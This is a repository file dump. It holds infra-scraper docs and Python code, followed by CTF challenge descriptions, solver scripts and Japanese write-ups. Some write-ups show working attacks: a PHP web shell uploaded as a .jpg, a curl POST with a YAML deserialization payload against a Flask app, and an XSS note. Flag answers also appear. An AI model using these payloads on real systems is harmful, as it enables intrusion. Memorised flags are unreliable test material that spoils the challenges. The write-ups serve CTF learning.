{}\n\nYou can also set the scraping storage backend to use the ETCD service instead\nof a local filesystem backend.\n\n.. code-block:: yaml\n\n storage:\n backend: etcd\n path: /scraper\n endpoints: {}\n\n\nEndpoints Configuration\n=======================\n\nEach endpoint kind expects a little different set of configuration. Look at\nindividual chapters for samples of required parameters to setup individual\nendpoints.\n" }, { "alpha_fraction": 0.6885644793510437, "alphanum_fraction": 0.698296844959259, "avg_line_length": 24.625, "blob_id": "54538990a9db8f9ef09c223147233a165b265ee6", "content_id": "97899efd65ff6bacc3eefa78d85c2b9c8ffb5b00", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 411, "license_type": "permissive", "max_line_length": 72, "num_lines": 16, "path": "/doc/source/text/input-openstack.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n================\nOpenStack Clouds\n================\n\nConfigurations for keystone v2 and keystone v3 clouds. Config for single\ntenant scraping.\n\n.. literalinclude:: ../static/config/config-openstack-project.yaml\n :language: yaml\n :emphasize-lines: 4\n\nConfig for scraping resources from entire cloud.\n\n.. literalinclude:: ../static/config/config-openstack-cloud.yaml\n :language: yaml\n :emphasize-lines: 4\n" }, { "alpha_fraction": 0.5658536553382874, "alphanum_fraction": 0.5707316994667053, "avg_line_length": 16, "blob_id": "ce5ba4db1ff5eb253b11331edf9eafd959c18722", "content_id": "0aad07a70d730b68afd40fb2ebc17cd3f629d16c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 205, "license_type": "permissive", "max_line_length": 23, "num_lines": 12, "path": "/doc/source/text/input-index.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n===================\nSupported Platforms\n===================\n\n.. toctree::\n :maxdepth: 2\n\n input-amazon.rst\n input-kubernetes.rst\n input-openstack.rst\n input-saltstack.rst\n input-terraform.rst\n" }, { "alpha_fraction": 0.5847670435905457, "alphanum_fraction": 0.5854838490486145, "avg_line_length": 39.72262954711914, "blob_id": "02f007b64acdafc5e814d6249646feeecd8b17cc", "content_id": "73650c1e151af0b63e7dd0c9f2056f16c61224f0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5580, "license_type": "permissive", "max_line_length": 99, "num_lines": 137, "path": "/infra_scraper/main.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nimport os\nimport importlib\nimport time\n\nfrom infra_scraper import constructors\nfrom infra_scraper import exceptions\nfrom infra_scraper.utils import load_yaml_json_file, setup_logger\n\nlogger = setup_logger(__name__)\n\nconfig_backend = os.environ.get('INFRA_SCRAPER_CONFIG_BACKEND',\n 'localfs')\nconfig_file = os.environ.get('INFRA_SCRAPER_CONFIG_PATH',\n '/etc/infra-scraper/config.yaml')\n\n\ndef _get_module(module_key):\n class_mapping = constructors.get_constructor_mapping()\n if module_key not in class_mapping:\n raise exceptions.InfraScraperException(\n \"Service {module_key} is unkown. Please pass in a client\"\n \" constructor or submit a patch to infra scraper\".format(\n module_key=module_key))\n mod_name, ctr_name = class_mapping[module_key].rsplit('.', 1)\n lib_name = mod_name.split('.')[0]\n try:\n mod = importlib.import_module(mod_name)\n except ImportError:\n raise exceptions.InfraScraperException(\n \"Client for '{module_key}' was requested, but\"\n \" {mod_name} was unable to be imported. Either import\"\n \" the module yourself and pass the constructor in as an argument,\"\n \" or perhaps you do not have module {lib_name} installed.\".format(\n module_key=module_key,\n mod_name=mod_name,\n lib_name=lib_name))\n try:\n ctr = getattr(mod, ctr_name)\n except AttributeError:\n raise exceptions.InfraScraperException(\n \"Client for '{module_key}' was requested, but although\"\n \" {mod_name} imported fine, the constructor at {fullname}\"\n \" as not found.\".format(\n module_key=module_key,\n mod_name=mod_name,\n fullname=class_mapping[module_key]))\n return ctr\n\n\nclass InfraScraper(object):\n def __init__(self):\n self.config = self.get_global_config()\n storage_class = self.config.get('storage', {'backend': 'localfs'})\n self.storage = self._get_module('storage',\n storage_class['backend'],\n storage_class)\n\n def _get_module(self, module_file, module_key, module_init={}):\n module_class = _get_module(\"{}-{}\".format(\n module_file, module_key))\n return module_class(**module_init)\n\n def get_global_config(self):\n return load_yaml_json_file(config_file)\n\n def get_config(self, name):\n config = self.config['endpoints'][name]\n config['name'] = name\n return config\n\n def status(self):\n config = self.config\n for endpoint_name, endpoint in self.config['endpoints'].items():\n endpoint.pop('config')\n endpoint['status'] = self.get_endpoint_status(endpoint_name)\n return config\n\n def get_endpoint_status(self, name):\n try:\n data = self.get_cached_data(name, 'count')\n except Exception as e:\n logger.error('Cannot get last status for {}, with error {}.'.format(name, e))\n data = None\n return data\n\n def scrape_all_data_forever(self, interval):\n config = self.get_global_config()\n while True:\n for endpoint_name, endpoint in config['endpoints'].items():\n self.scrape_data(endpoint_name)\n time.sleep(config.get('scrape_interval', 60))\n\n def scrape_all_data(self):\n config = self.get_global_config()\n for endpoint_name, endpoint in config['endpoints'].items():\n if config.get('debug', False):\n return self.scrape_data(endpoint_name)\n try:\n self.scrape_data(endpoint_name)\n except Exception as e:\n logger.error('Scraping endpoint {} failed with error: {}'.format(endpoint_name, e))\n\n def scrape_data_forever(self, name, interval):\n config = self.get_global_config()\n sleep_interval = config.get('scrape_interval', interval)\n while True:\n self.scrape_data(name)\n logger.info('Sleeping for {} seconds.'.format(sleep_interval))\n time.sleep(sleep_interval)\n\n def scrape_data(self, name):\n config = self.get_config(name)\n self.input = self._get_module('input', config['kind'], config)\n self.out_count = self._get_module('output', 'count')\n self.out_vis = self._get_module('output', 'vis')\n self.out_vis_hier = self._get_module('output', 'vis-hier')\n logger.info('Scraping of {} started.'.format(name))\n self.input.scrape_all_resources()\n data = self.input.to_dict()\n self.storage.save_data(name, data.copy())\n self.storage.save_output_data(name, 'count',\n self.out_count.get_data('raw', data.copy()))\n self.storage.save_output_data(name, 'vis',\n self.out_vis.get_data('raw', data.copy()))\n self.storage.save_output_data(name, 'vis-hier',\n self.out_vis_hier.get_data('raw', data.copy()))\n logger.info('Scraping of {} completed.'.format(name))\n\n def get_cached_data(self, name, kind):\n storage = self._get_module('storage', 'file')\n data = storage.load_output_data(name, kind)\n return data\n\n def get_data(self, name, kind, format='raw'):\n self.output = self._get_module('output', kind)\n data = self.storage.load_data(name)\n return self.output.get_data(format, data)\n" } ]
47
security-notes/workspace
https://github.com/security-notes/workspace
a1dbfd005a73744d53ecae49364bd3db56f0fe1f
27ed56632bd6aa4af44e08fc3954351a275aba24
c5fb026780db7159db1c82292b67073c3b003367
refs/heads/dev
2023-07-16T01:09:26.779200
2021-08-14T04:48:04
2021-08-14T04:48:04
395,896,811
0
0
null
2021-08-14T05:06:53
2021-08-14T05:06:54
2021-08-14T05:09:31
null
[ { "alpha_fraction": 0.7665369510650635, "alphanum_fraction": 0.8093385100364685, "avg_line_length": 27.55555534362793, "blob_id": "6c04f4726614c067ef09808667e16ea01fc231df", "content_id": "a1b66beaee56ff3a15f131a89cefb2137845ab7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 377, "license_type": "no_license", "max_line_length": 107, "num_lines": 9, "path": "/2021/WaniCTF21-spring/Git_Master/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "https://hub.docker.com/r/wanictf21spring/nginx_on_ubuntu\n\nホームページをみんなで開発したいので、イメージを公開するです。\n\n昔、秘密の文字列をコミットしたことがあるけど大丈夫だよね...?\n\n[mis-git-master.zip](https://score.wanictf.org/storage/s3qxpo5tonj4uvujrlq5sal9hd8alowg/mis-git-master.zip)\n\nWriter : okmt, hi120ki\n" }, { "alpha_fraction": 0.5976190567016602, "alphanum_fraction": 0.7476190328598022, "avg_line_length": 23.705883026123047, "blob_id": "43b691544165258f6f5eb6dbf653c06ed0a3f1ae", "content_id": "ae4bf46c0cd38e240ddb1a6320795c82d955e115", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 476, "license_type": "no_license", "max_line_length": 213, "num_lines": 17, "path": "/2021/BCACTF_2.0/Storytime_The_Opening_Gambit/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n実行ファイルが与えられる。\n\n```bash\n$ file story\nstory: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=ccea544c84172f60a939819e4416fdd108982090, for GNU/Linux 3.2.0, not stripped\n```\n\nstringsコマンドでフラグが見つかった。\n\n```bash\n$ strings story | grep bcactf\nbcactf{w0ol_m4k3s_str1ng_ziv4mk3ca91b}\n```\n\n<!-- bcactf{w0ol_m4k3s_str1ng_ziv4mk3ca91b} -->\n" }, { "alpha_fraction": 0.48163264989852905, "alphanum_fraction": 0.6122449040412903, "avg_line_length": 29.75, "blob_id": "d4f94c91fecf891e68dc516891c848c760b9f430", "content_id": "2ef2560ff2a1e437bdd220cecae84243bce50ebb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 245, "license_type": "no_license", "max_line_length": 66, "num_lines": 8, "path": "/2021/UMassCTF_2021/PikCha/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import requests\n\ndata = {'guess':'find . -name *'}\nwith requests.Session() as session:\n r = session.get(\"http://104.197.195.221:8084/\")\n for _ in range(500):\n r = session.post(\"http://104.197.195.221:8084/\",data=data)\n print(r.text)" }, { "alpha_fraction": 0.48188406229019165, "alphanum_fraction": 0.5181159377098083, "avg_line_length": 20.30769157409668, "blob_id": "d777ac00107429d164b079f8a596ee9f29b8adb4", "content_id": "5fb2974fcd2f38ab71b8ba67604d8beaa9904783", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 276, "license_type": "no_license", "max_line_length": 43, "num_lines": 13, "path": "/2021/BCACTF_2.0/More_than_Meets_the_Eye/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from Crypto.Util.number import *\n\ntext = open('zwsp.txt','rb').read()\n\nbinary = ''\nfor i,t in enumerate(text):\n if(t == 0xe2):\n if(text[i:i+3] == b'\\xe2\\x80\\x8b'):\n binary += '0'\n else:\n binary += '1'\n\nprint(long_to_bytes(int(binary,2)))" }, { "alpha_fraction": 0.6360294222831726, "alphanum_fraction": 0.7904411554336548, "avg_line_length": 37.85714340209961, "blob_id": "fae3f7850c4eeab20b1ca49c8dc225d60962c7f1", "content_id": "a6f072b3d258bf0431f5e907bf750f637279dfd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 272, "license_type": "no_license", "max_line_length": 87, "num_lines": 7, "path": "/2021/UIUCTF_2021/back_to_basics/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Shoutout to those people who think that base64 is proper encryption\n\n**author**: epistemologist\n\n[main.py](https://uiuc.tf/files/7c9e0cac76b48d1605b4b3e1b6417877/main.py?token=eyJ1c2VyX2lkIjoxMjMwLCJ0ZWFtX2lkIjo2MjMsImZpbGVfaWQiOjE2fQ.YQWOYQ.s1trughJs9laAJn66SnfKaLfVvE)\n\n[flag_enc](https://uiuc.tf/files/7d9891aa7bed8a839c3379ebc3194a4a/flag_enc?token=eyJ1c2VyX2lkIjoxMjMwLCJ0ZWFtX2lkIjo2MjMsImZpbGVfaWQiOjE3fQ.YQWOYQ.exI2pjzAKHhN-Efc7n3_THTLYZI)\n" }, { "alpha_fraction": 0.3641851246356964, "alphanum_fraction": 0.38430583477020264, "avg_line_length": 21.636363983154297, "blob_id": "04001a34759703496402c520b08d38de7fd2ca31", "content_id": "5aa3e38189d1fdb5467a0382cd17a36a1563b791", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 497, "license_type": "no_license", "max_line_length": 50, "num_lines": 22, "path": "/2020/WaniCTF/logged_flag/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import re\n\ncmd = ''\n\nwith open('./key_log.txt') as f:\n for _ in range(317):\n line = f.readline()\n key = re.findall(r'(?<=\\[).+?(?=\\])',line)\n if len(key) == 0:\n continue\n if key[0] == 'Enter':\n cmd += '\\n'\n elif key[0] == 'Shift':\n continue\n elif key[0] == 'Space':\n cmd += ' '\n elif key[0] == 'BackSpace':\n cmd = cmd[:-1]\n else:\n cmd += key[0].lower()\n \n print(cmd)" }, { "alpha_fraction": 0.8488371968269348, "alphanum_fraction": 0.8720930218696594, "avg_line_length": 16.399999618530273, "blob_id": "114b0dee5b564c69a0f183e7c191f5545cac5998", "content_id": "1deddc7ecc9df83634f0185449ce7781e487bbe8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 178, "license_type": "no_license", "max_line_length": 34, "num_lines": 5, "path": "/2020/WaniCTF/ALLIGATOR_02/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "コマンドプロンプトの実行履歴からFLAGを見つけてください。\n\n(ALLIGATOR_01で配布されているファイルを使ってください)\n\nWriter : takushooo" }, { "alpha_fraction": 0.6798029541969299, "alphanum_fraction": 0.7241379022598267, "avg_line_length": 17.454545974731445, "blob_id": "a3d2b9a8f2062df358ceebff9d5e8b048b55ca8c", "content_id": "567e2808c65abbec918cca4fb984c7b00453a99c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 203, "license_type": "no_license", "max_line_length": 89, "num_lines": 11, "path": "/2021/BCACTF_2.0/Home_Automation/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Check out my super secure home automation system! No, don't try turning the lights off...\n\nhttp://web.bcactf.com:49155/\n\nHint 1 of 2\n\nHow do websites know who you are?\n\nHint 2 of 2\n\nWhat's on the table?\n" }, { "alpha_fraction": 0.4522292912006378, "alphanum_fraction": 0.7261146306991577, "avg_line_length": 18.625, "blob_id": "34571e751d1f9ec08a7fafe8ba683d8db096ad69", "content_id": "03825e346e2fab95fa8f44b848f9b0d8624914f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 314, "license_type": "no_license", "max_line_length": 43, "num_lines": 16, "path": "/2021/redpwnCTF_2021/baby/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "n = 228430203128652625114739053365339856393\ne = 65537\nc = 126721104148692049427127809839057445790\n\nfrom factordb.factordb import FactorDB\nfrom Crypto.Util.number import *\n\nf = FactorDB(n)\nf.connect()\nfactors = f.get_factor_list()\n\n[p, q] = factors\nd = pow(e,-1,(p-1)*(q-1))\nm = pow(c,d,n)\n\nprint(long_to_bytes(m))\n" }, { "alpha_fraction": 0.7283105254173279, "alphanum_fraction": 0.7922374606132507, "avg_line_length": 47.77777862548828, "blob_id": "9d6e85b26b3725068afd3308cc4e637d5ae6d9ba", "content_id": "0b258002627469f7e891331588af8276155e2845", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 438, "license_type": "no_license", "max_line_length": 219, "num_lines": 9, "path": "/2020/pbctf_2020/Queensarah2/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "The secret mainframe for a distributed hacker group has been discovered. We have managed to exfiltrate some of the code that it runs, but we don't have a physical copy of their access badges. Can you still get the flag?\n\nRemote: `nc queensarah2.chal.perfect.blue 1`\n\nNote: enter flag as `pbctf{lower_case_flag_text}`\n\nBy: UnblvR\n\n[challenge.py](https://storage.googleapis.com/pbctf-2020-ctfd/d85406864a9da1d7ea007ad585c20685/challenge.py)" }, { "alpha_fraction": 0.6885964870452881, "alphanum_fraction": 0.7368420958518982, "avg_line_length": 19.727272033691406, "blob_id": "d71646c4f3a6c634d5408f78986f0c74edc6ab9a", "content_id": "f658b19731d28535fbb5a69fbae625516ccf96d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 228, "license_type": "no_license", "max_line_length": 125, "num_lines": 11, "path": "/2021/ImaginaryCTF_2021/Imaginary/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "**Description**\n\nWhat's ImaginaryCTF without good old sqrt(-1)?\n\n**Attachments**\n\n[https://imaginaryctf.org/r/CE4D-imaginary.py](https://imaginaryctf.org/r/CE4D-imaginary.py) `nc chal.imaginaryctf.org 42015`\n\n**Author**\n\nEth007\n" }, { "alpha_fraction": 0.5504424571990967, "alphanum_fraction": 0.6159291863441467, "avg_line_length": 15.647058486938477, "blob_id": "334c04cbc5a69e79598b88d16b2033f94a84002a", "content_id": "3999a0068c7a588ae7cd89ac7e23343a1fd2c124", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 791, "license_type": "no_license", "max_line_length": 43, "num_lines": 34, "path": "/2020/WaniCTF/Find_a_Number/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nサーバーで生成された`0~500000` のランダムな値を当てればフラグが得られそう。\n\n間違えたときに、大きいか小さいかの情報が得られるので二分探索で絞り込んでいく。\n\n20回トライでき、`2^20 > 500000` なので確実に特定できる。\n\n以下のプログラムを実行するとフラグが得られる。\n\n```py\nfrom pwn import *\n\nconn = remote('number.wanictf.org',60000)\nn_min, n_max = 0, 500000\n\nwhile True:\n\n conn.recvuntil('input:')\n mid = (n_min + n_max) // 2\n conn.sendline(str(mid))\n\n msg = str(conn.recvlines(2))\n\n if 'small' in msg:\n n_min = mid\n elif 'big' in msg:\n n_max = mid\n else:\n print(msg)\n break\n```\n\n<!-- FLAG{b1n@ry_5e@rch_1s_v3ry_f@5t} -->" }, { "alpha_fraction": 0.7425373196601868, "alphanum_fraction": 0.766791045665741, "avg_line_length": 30.58823585510254, "blob_id": "cefc6c48971f29d9f79d8b854f676f6c8bef7ac0", "content_id": "6cf6ff2d928142c9b2aa6b7475bba5de5a1f9c01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 536, "license_type": "no_license", "max_line_length": 135, "num_lines": 17, "path": "/2021/BCACTF_2.0/Honors_ABCs/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Here at BCA, we don't deal with normal classes. Everything is at the honors level or above! Let's start by learning about the alphabet.\n\nAnd by learning, we obviously mean testing. Don't cheat!\n\n[honors-abcs.c](https://objects.bcactf.com/bcactf2/honors-abcs/honors-abcs.c)\n\n[honors-abcs](https://objects.bcactf.com/bcactf2/honors-abcs/honors-abcs)\n\n`nc bin.bcactf.com 49155`\n\nHint 1 of 2\n\nThe response variable is only 50 characters long. What happens if you ignore that?\n\nHint 2 of 2\n\nTry compiling the program. Are there any warnings?" }, { "alpha_fraction": 0.7516778707504272, "alphanum_fraction": 0.8255033493041992, "avg_line_length": 29, "blob_id": "a0846b854652f0032cad4773a25658d35e7641f3", "content_id": "77f8b07adde8e7441a87e6d453cd9a32eee7cdaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 169, "license_type": "no_license", "max_line_length": 121, "num_lines": 5, "path": "/2021/WaniCTF21-spring/Simple_conversion/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "戻し方を忘れました…\n\n[cry-simple-conversion.zip](https://score.wanictf.org/storage/rd6uex6si8ovnzjh6djzv794q80lb7u9/cry-simple-conversion.zip)\n\nWriter : Laika" }, { "alpha_fraction": 0.46666666865348816, "alphanum_fraction": 0.6333333253860474, "avg_line_length": 9, "blob_id": "94364dfc93e95d63d20015cd26328cb89cad657a", "content_id": "c9e3e854f320f4d4e05f0ab6f557b75813ca1138", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 30, "license_type": "no_license", "max_line_length": 16, "num_lines": 3, "path": "/2021/redpwnCTF_2021/compliant-lattice-feline/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "get a flag!\n\n`nc mc.ax 31443`\n" }, { "alpha_fraction": 0.6625766754150391, "alphanum_fraction": 0.8343558311462402, "avg_line_length": 53.33333206176758, "blob_id": "c77519bc7655a83f89a4206d95c2984cfa5ef5aa", "content_id": "673fb39b167ac0fe1cc64a731bee6163e388e397", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 163, "license_type": "no_license", "max_line_length": 114, "num_lines": 3, "path": "/2021/RaRCTF_2021/verybabyrev/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "fun fact: verybabyrev backwards is verybabyrev\n\n[verybabyrev - ad2b44](https://files-ctf.rars.win/challenge-files/52/ad2b443030c035d29e900d64e61b8520/verybabyrev)\n" }, { "alpha_fraction": 0.5609756112098694, "alphanum_fraction": 0.6747967600822449, "avg_line_length": 16.619047164916992, "blob_id": "018a473693616b9b392e96fc9004ebee5b635027", "content_id": "ffeca8dadf0e06c4d5a162a17e383d2d4f3cf127", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 541, "license_type": "no_license", "max_line_length": 63, "num_lines": 21, "path": "/2021/UMassCTF_2021/Hermit_Part_1/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nページにアクセスすると、ファイルアップロードの画面が表示される。\n\n![](img/2021-03-27-16-38-37.png)\n\n特定の画像ファイルしかアップロードできないが、`.jpg`という拡張子のファイルにPHPコードを書くと実行させることができる。\n\n```php\n<?php \nsystem(\"find / -name *flag*\");\necho \"<br>\";\nsystem(\"cat /home/hermit/userflag.txt\");\n?>\n```\n\n![](img/2021-03-27-16-39-00.png)\n\n![](img/2021-03-27-16-40-11.png)\n\n<!-- UMASS{a_picture_paints_a_thousand_shells} -->" }, { "alpha_fraction": 0.760765552520752, "alphanum_fraction": 0.7942583560943604, "avg_line_length": 41, "blob_id": "0430308b16c623b2f3e2ebef3e229de9d7af02eb", "content_id": "6cce65c2ea21af776a5c984ed46f2f5420c6932c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 210, "license_type": "no_license", "max_line_length": 115, "num_lines": 5, "path": "/2021/angstromCTF_2021/Archaic/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "The archaeological team at ångstromCTF has uncovered an archive from over 100 years ago! Can you read the contents?\n\nAccess the file at `/problems/2021/archaic/archive.tar.gz` on the shell server.\n\nAuthor: kmh" }, { "alpha_fraction": 0.6378591060638428, "alphanum_fraction": 0.6723818182945251, "avg_line_length": 27.556291580200195, "blob_id": "1515b2341fa2a394113149cf048978a4ba0ea24b", "content_id": "cab2d1c302cb9511d6258685370e5eb7931562cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5092, "license_type": "no_license", "max_line_length": 214, "num_lines": 151, "path": "/2020/CyberSecurityRumble2020/Wheels_n_Whales/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Not solved :(\n\n# Try\n\nhttp://chal.cybersecurityrumble.de:7780 にアクセス。\n\n![](img/2020-10-31-17-15-23.png)\n\n![](img/2020-10-31-17-14-00.png)\n\n入力欄があって、[submit] を押すと入力した内容と画像が表示される。\n\n![](img/2020-10-31-17-14-54.png)\n\n\n```py\nimport yaml\nfrom flask import redirect, Flask, render_template, request, abort\nfrom flask import url_for, send_from_directory, make_response, Response\nimport flag\n\napp = Flask(__name__)\n\nEASTER_WHALE = {\"name\": \"TheBestWhaleIsAWhaleEveryOneLikes\", \"image_num\": 2, \"weight\": 34}\n\[email protected](\"/\")\ndef index():\n return render_template(\"index.html.jinja\", active=\"home\")\n\n\nclass Whale:\n def __init__(self, name, image_num, weight):\n self.name = name\n self.image_num = image_num\n self.weight = weight\n \n def dump(self):\n return yaml.dump(self.__dict__)\n\n\[email protected](\"/whale\", methods=[\"GET\", \"POST\"])\ndef whale():\n if request.method == \"POST\":\n name = request.form[\"name\"]\n if len(name) > 10: \n return make_response(\"Name to long. Whales can only understand names up to 10 chars\", 400)\n image_num = request.form[\"image_num\"]\n weight = request.form[\"weight\"]\n whale = Whale(name, image_num, weight)\n if whale.__dict__ == EASTER_WHALE:\n return make_response(flag.get_flag(), 200) # ★\n return make_response(render_template(\"whale.html.jinja\", w=whale, active=\"whale\"), 200)\n return make_response(render_template(\"whale_builder.html.jinja\", active=\"whale\"), 200)\n\n\nclass Wheel:\n def __init__(self, name, image_num, diameter):\n self.name = name\n self.image_num = image_num\n self.diameter = diameter\n\n @staticmethod\n def from_configuration(config):\n return Wheel(**yaml.load(config, Loader=yaml.Loader))\n \n def dump(self):\n return yaml.dump(self.__dict__)\n\n\[email protected](\"/wheel\", methods=[\"GET\", \"POST\"])\ndef wheel():\n if request.method == \"POST\":\n if \"config\" in request.form:\n wheel = Wheel.from_configuration(request.form[\"config\"])\n return make_response(render_template(\"wheel.html.jinja\", w=wheel, active=\"wheel\"), 200)\n name = request.form[\"name\"]\n image_num = request.form[\"image_num\"]\n diameter = request.form[\"diameter\"]\n wheel = Wheel(name, image_num, diameter)\n print(wheel.dump())\n return make_response(render_template(\"wheel.html.jinja\", w=wheel, active=\"wheel\"), 200)\n return make_response(render_template(\"wheel_builder.html.jinja\", active=\"wheel\"), 200)\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=5000)\n\n```\n\n★を実行できればフラグが得られそう。\n\nただし、`name`が長いので普通に入力しても、\n\n```py\nif len(name) > 10: \n return make_response(\"Name to long. Whales can only understand names up to 10 chars\", 400)\n```\n\nによって弾かれてしまう。\n\n![](img/2020-10-31-17-32-11.png)\n\nFlaskに対するSSTIを試してみたが、Formで与えた値がstr型になっているので上手くいかなった。\n\n* [CTF的 Flaskに対する攻撃まとめ](https://qiita.com/koki-sato/items/6ff94197cf96d50b5d8f)\n\n入力された文字列が表示されるので`<script>`タグを埋め込んでXSSすることもできたりする。\n\n![](img/2020-11-02-01-06-58.png)\n\n# Solution\n\n[writeup]\n\n* https://cryptax.github.io/2020/11/01/whales.html\n\n`config`パラメータをつけてPOSTリクエストを送ると`from_configuration()`が実行されることが分かる。\n\n```py\n@staticmethod\ndef from_configuration(config):\n return Wheel(**yaml.load(config, Loader=yaml.Loader))\n```\n\n```py\nif \"config\" in request.form:\n wheel = Wheel.from_configuration(request.form[\"config\"])\n return make_response(render_template(\"wheel.html.jinja\", w=wheel, active=\"wheel\"), 200)\n```\n\nここで、`yaml.load()`に任意のデータを与えることによって攻撃する。\n\n>**Warning**: It is not safe to call yaml.load with any data received from an untrusted source! yaml.load is as powerful as pickle.load and so may call any Python function. Check the yaml.safe_load function though.\n>> https://pyyaml.org/wiki/PyYAMLDocumentation\n\n`yaml.load()`にはpythonオブジェクトを埋め込むことができるので、`flag.get_flag()`関数を`apply()`で呼び出すようにする。\n\n`!!python/object/apply:flag.get_flag`\n\nよって、以下を実行すると`name`にフラグが表示される。\n\n```bash\ncurl -X POST http://chal.cybersecurityrumble.de:7780/wheel -d 'config={name: !!python/object/apply:flag.get_flag [], image_num: 2, diameter: 5}'\n```\n\n<!-- CSR{TH3_QU3STION_I5_WHY_WHY_CAN_IT_DO_THAT?!?} -->\n\n## コメント\n\nこういった背景もあってか、公式では`yaml.load()`ではなく`yaml.safe_load()`が推奨されていることを学んだ。\n\n`config`パラメータをPOSTしたときのための処理があるのは気づいていたが、設定ファイルを読み込むためのものだと思ってスルーしてしまったのが甘かった。\n\n\n\n\n" }, { "alpha_fraction": 0.6140350699424744, "alphanum_fraction": 0.7789473533630371, "avg_line_length": 30.66666603088379, "blob_id": "c1d46398cc457cb901b1d3617c80755f0b464f9e", "content_id": "7b1b937a30dbe98d4c06b6129ba4ed6d6e76e5d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 285, "license_type": "no_license", "max_line_length": 117, "num_lines": 9, "path": "/2021/redpwnCTF_2021/pastebin-1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Ah, the classic pastebin. Can you get the admin's cookies?\n\n[pastebin-1.mc.ax](https://pastebin-1.mc.ax/)\n\n[Admin bot](https://admin-bot.mc.ax/pastebin-1)\n\nDownloads\n\n[main.rs](https://static.redpwn.net/uploads/4313574d2348012d122d849530c4f18340644d88ea04f0cbb4932bd35efde1da/main.rs)\n" }, { "alpha_fraction": 0.6632652878761292, "alphanum_fraction": 0.8163265585899353, "avg_line_length": 27.14285659790039, "blob_id": "a4d02a09c889c0ba5537aad273e2115051602637", "content_id": "bd8ecf74324a72b963e5470abff2c8defddb4c69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 206, "license_type": "no_license", "max_line_length": 109, "num_lines": 7, "path": "/2021/SECCON_Beginners_CTF_2021/simple_RSA/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Let's encrypt it with RSA!\n\n[simple_RSA.tar.gz](https://beginners-dist-production.s3.isk01.sakurastorage.jp/simple_RSA/simple_RSA.tar.gz)\n\n0bf8879ad05cc4b49a643f4ef3c8672468862d56\n\n想定難易度: Beginner" }, { "alpha_fraction": 0.7153846025466919, "alphanum_fraction": 0.7923076748847961, "avg_line_length": 22.727272033691406, "blob_id": "5b36566f5166873c1107b111a2b5853aec245373", "content_id": "8f53c2724e695c9bbe26499f271ca1adb4ce2536", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 292, "license_type": "no_license", "max_line_length": 113, "num_lines": 11, "path": "/2021/WaniCTF21-spring/Automaton_Lab/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Automaton Lab.で将来予測のお手伝いをしましょう\n\n```\nnc automaton.mis.wanictf.org 